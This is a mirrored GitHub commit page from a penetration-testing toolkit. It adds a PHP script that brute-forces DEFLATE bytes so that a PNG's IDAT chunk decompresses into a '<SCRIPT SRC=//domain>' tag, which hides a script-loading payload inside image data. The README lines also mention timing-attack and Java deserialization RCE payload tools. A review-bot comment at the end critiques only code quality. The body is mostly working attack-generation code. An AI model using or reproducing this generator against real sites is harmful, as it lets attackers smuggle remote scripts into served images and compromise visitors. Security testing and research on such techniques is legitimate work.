mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2025-01-24 16:29:30 +01:00
Added my very simple script named generate_png_backdoor_idat_chunks.php
parent
8c23453c9f
commit
5e2c945322
@ -20,6 +20,8 @@
|
||||
|
||||
- **`dummy-web-server.py`** - a minimal http server in python. Responds to GET, HEAD, POST requests, but will fail on anything else. Forked from: [bradmontgomery/dummy-web-server.py](https://gist.github.com/bradmontgomery/2219997) ([gist](https://gist.github.com/mgeeky/c0675b2cf65bad6171edcb8f3bb2af6d))
|
||||
|
||||
- **`generate_png_backdoor_idat_chunks.php`** - PHP script implementing idea of encoding Web Shells in PNG iDAT chunks, according to [this](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) research.
|
||||
|
||||
- **`http-auth-timing.py`** - HTTP Auth Timing attack tool as presented at Ruxcon CTF 2012 simple web challange. The tools tries to use every letter for auth password and construct the entire password upon the longest took authentication request. ([gist](https://gist.github.com/mgeeky/57e866604942f1824da310982c46da84))
|
||||
|
||||
- **`java-XMLDecoder-RCE.md`** - Java Beans XMLDecoder XML-deserialization Remote Code Execution payloads. ([gist](https://gist.github.com/mgeeky/5eb48b17c9d282ad3170ef91cfb6fe4c))
|
||||
|
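--- /dev/null
+++ b/web/generate_png_backdoor_idat_chunks.php
@@ -0,0 +1,36 @@
+<?php
+$domain = strtoupper($argv[1]);
+$filename = $argv[2];
+
+// DEFLATE stream bytes
+$prefix = '7ff399281922111510691928276e6e';
+$suffix = '576e69b16375535b6f';
+
+$precode = '<SCRIPT SRC=//';
+$postcode = '></SCRIPT>';
+
+print "Input string to embed in PNG IDAT chunks:\n";
+print '"' . $precode . $domain . $postcode . "\"\n\n\n";
+
+$cnt = 0;
+for( $i = 0x111111111111; $i < 0xffffffffffff; $i++, $cnt++) {
+$b = implode('', str_split(str_pad(dechex($i), 12, '0', STR_PAD_LEFT), 2));
+
+try {
+$defl = gzdeflate(hex2bin($prefix . $b . $suffix ));
+
+if ( $cnt % 100000 == 0) {
+printf("[Probe: %06d] %s\r\n", $cnt, $defl);
+}
+
+if (strpos(strtoupper($defl), $precode.$domain.$postcode) !== false ) {
+$cont = bin2hex($defl);
+printf("DEFLATE stream found!\n%s\n%s\n\n", $prefix.$b.$suffix, $defl);
+file_put_contents($filename, $cont);
+}
+} catch( exception $e) {
+}
+}
+
+print 'Done.'
+?>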
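Review bot: `$argv[1]` and `$argv[2]` are read on the first two statements without any `$argc` check, so a run with missing arguments only raises warnings, enters the long loop with an empty domain, and would later reach `file_put_contents()` with an empty or null filename. A guard before the assignments, such as `if ($argc < 3) { fwrite(STDERR, "usage: php generate_png_backdoor_idat_chunks.php <domain> <outfile>\n"); exit(1); }`, would fail fast instead. The `try { … } catch( exception $e) { }` around the loop body looks dead as written: `hex2bin()` reports bad input by returning `false` with a warning rather than throwing, and `gzdeflate()` likewise returns `false` on failure, so the empty catch handles nothing and a failed call passes silently into `strtoupper()`/`strpos()`. An explicit `if ($defl === false) { continue; }` would state the intent. Both `printf` calls also write the raw binary `$defl` to the terminal, where control bytes can garble the display; `bin2hex($defl)` is the safer thing to print.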